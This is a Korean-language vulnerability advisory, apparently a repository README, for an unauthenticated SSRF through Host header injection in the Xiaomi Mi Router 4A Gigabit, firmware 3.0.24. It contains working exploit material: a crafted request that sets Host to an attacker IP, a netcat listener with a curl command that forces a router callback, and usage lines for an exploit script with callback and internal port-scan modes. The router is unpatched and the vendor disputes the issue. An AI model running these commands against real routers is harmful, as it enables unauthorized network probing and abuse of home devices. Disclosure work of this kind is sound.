
Xiaomi Mi Router 4A Gigabit Edition(펌웨어 3.0.24)에서 Host Header Injection을 통한 인증되지 않은 SSRF — CVE-2026-26898
샤오미 Mi Router 4A Gigabit 에디션에서 서버 측 요청 위조(SSRF) 취약점이 발견되었습니다. 라우터의 웹 인터페이스가 HTTP Host 헤더를 검증하지 않아 인증되지 않은 공격자가 라우터를 강제로 임의의 아웃바운드 TCP 연결을 수행하게 할 수 있습니다.
| 필드 | 값 |
|---|---|
| 장치 | 샤오미 Mi Router 4A Gigabit 에디션 |
| 펌웨어 | 3.0.24 (국제판) |
| CVE | CVE-2026-26898 (분쟁 중 — 아래 공개 상태 참조) |
| CWE | CWE-918 (서버 측 요청 위조) |
| CVSS 3.1 | 8.6 (높음) — 연구원 평가 수치, 공급업체는 심각도에 이의 제기 |
상태: 공급업체가 이의 제기 — 이 보고서는 샤오미에 접수되지 않았습니다.
CVE-2026-26898은 여기서 추적 목적으로만 사용되었습니다. 공급업체의 이의 제기를 고려할 때 이는 공급업체가 확인한 것이 아닌 분쟁 중 / 미확인 상태로 취급해야 합니다.
GET /cgi-bin/luci/api/xqsystem/login HTTP/1.1
Host: <ATTACKER_IP>:<PORT>

python3 xiaomi_ssrf_exploit.py --target 192.168.31.1 --check
[*] Checking vulnerability on 192.168.31.1...
[*] Local IP: 192.168.31.235
[*] Test Port: 44444
[+] VULNERABLE! Router connected back to 192.168.31.235:44444
# Terminal 1: Start listener
nc -l 4444
# Terminal 2: Send malicious request
curl -H "Host: YOUR_IP:4444" "http://192.168.31.1/cgi-bin/luci/api/xqsystem/login"
| 파일 | 설명 |
|---|---|
xiaomi_ssrf_exploit.py | 여러 모드를 지원하는 전체 익스플로잇 |
# Check if vulnerable
python3 xiaomi_ssrf_exploit.py --target ROUTER_IP --check
# Callback mode
python3 xiaomi_ssrf_exploit.py --target ROUTER_IP --callback YOUR_IP --port 4444
# Port scanner
python3 xiaomi_ssrf_exploit.py --target ROUTER_IP --scan TARGET_IP --ports 22,23,80,443
| 날짜 | 이벤트 |
|---|---|
| 2026-01-15 | 취약점 발견, PoC 개발 |
| 2026-01-16 | HackerOne(#3513458)을 통해 샤오미에 보고 |
| 2026-01-23 | 샤오미가 보고서를 정보 제공(Informative) 으로 종결(저위험, 수정 예정 없음) |
| 2026-06-03 | 공개 보안 권고 발표(이 저장소) — 공급업체 이의 제기, 패치되지 않음 |
본 익스플로잇은 교육 및 공인된 보안 테스트 목적으로만 제공됩니다. 컴퓨터 시스템에 대한 무단 접근은 불법입니다.
Ahmet Mersin
🌐 ahmetmersin.com
🐙 @iwallplace